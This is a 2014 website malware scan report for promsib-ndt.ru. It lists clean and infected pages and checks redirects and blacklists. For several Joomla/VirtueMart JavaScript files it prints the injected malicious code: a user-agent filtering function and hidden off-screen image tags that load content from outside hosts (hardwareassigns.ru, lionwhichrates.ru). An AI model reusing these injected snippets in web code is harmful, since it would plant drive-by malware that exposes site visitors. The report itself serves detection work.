Scanned pages/files
Request | Server response | Status |
http://promsib-ndt.ru/ | 200 OK Content-Length: 20695 Content-Type: text/html | clean |
http://promsib-ndt.ru/modules/mod_jv_headline/assets/js/slideshow5.js | 200 OK Content-Length: 17899 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. this.info.start(1); }.bind(this));; } } }); ;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/templates/jv_zuni/jv_menus/jv_moomenu/jv.moomenu.js | 200 OK Content-Length: 5034 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. }); } } }); return this; } }); window.addEvent('domready',function() {new MooMenu($('menusys_moo'))});;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/templates/jv_zuni/js/jv.script.js | 200 OK Content-Length: 3595 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. settings['colors'] = jvpathcolor + 'teal_nodub_zabil.css'; StyleCookie.empty(); StyleCookie.extend(settings); });} });;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/tmp/src/mucury.js | 200 OK Content-Length: 112067 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\ if (!mdom) { newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>"; if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); } } } Antivirus reports:
| ||
http://promsib-ndt.ru/index.php?option=com_content&view=frontpage&Itemid=1 | 200 OK Content-Length: 20715 Content-Type: text/html | clean |
http://promsib-ndt.ru/index.php?option=com_virtuemart&view=categories&virtuemart_category_id=0&Itemid=75 | 200 OK Content-Length: 26465 Content-Type: text/html | clean |
http://promsib-ndt.ru/ajax/libs/jquery/1.6.4/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: application/javascript | clean |
http://promsib-ndt.ru/ajax/libs/jqueryui/1.8.16/jquery-ui.min.js | 200 OK Content-Length: 201875 Content-Type: application/javascript | clean |
http://promsib-ndt.ru/components/com_virtuemart/assets/js/jquery.ui.autocomplete.html.js | 200 OK Content-Length: 2970 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. .append( $( "<a></a>" )[ this.options.html ? "html" : "text" ]( item.label ) ) .appendTo( ul ); } }); })( jQuery ); ;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/components/com_virtuemart/assets/js/jquery.noConflict.js | 200 OK Content-Length: 1927 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. } }; })();jQuery.noConflict();;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/components/com_virtuemart/assets/js/vmsite.js | 200 OK Content-Length: 4872 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18. } else { $.error( 'Method ' + method + ' does not exist on Vm2 front jQuery library' ); } }; })(jQuery) ;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://hardwareassigns.ru/jm8IL.fLcjlnsND4d?default"></iframe>');;console.log('<img height="20" width="20" style="position:absolute;left:-1000px;top:0;" src="http://lionwhichrates.ru/OKJ9z.ia7l?default"></iframe>');; Antivirus reports:
| ||
http://promsib-ndt.ru/index.php?option=com_content&view=article&id=72&Itemid=76 | 200 OK Content-Length: 12524 Content-Type: text/html | clean |
http://promsib-ndt.ru/index.php?option=com_content&view=article&id=74&Itemid=77 | 200 OK Content-Length: 12443 Content-Type: text/html | clean |
http://promsib-ndt.ru/index.php?option=com_content&view=article&id=76&Itemid=78 | 200 OK Content-Length: 16906 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: promsib-ndt.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 03:09:21 GMT
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.4.6-1ubuntu1.2
GET / HTTP/1.1
Host: promsib-ndt.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 23 Jun 2014 03:09:21 GMT
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.4.6-1ubuntu1.2
Second query (visit from search engine):
GET / HTTP/1.1
Host: promsib-ndt.ru
Referer: http://www.google.com/search?q=promsib-ndt.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: promsib-ndt.ru
Referer: http://www.google.com/search?q=promsib-ndt.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=promsib-ndt.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://promsib-ndt.ru/
Result: promsib-ndt.ru is not infected or malware details are not published yet.
Result: promsib-ndt.ru is not infected or malware details are not published yet.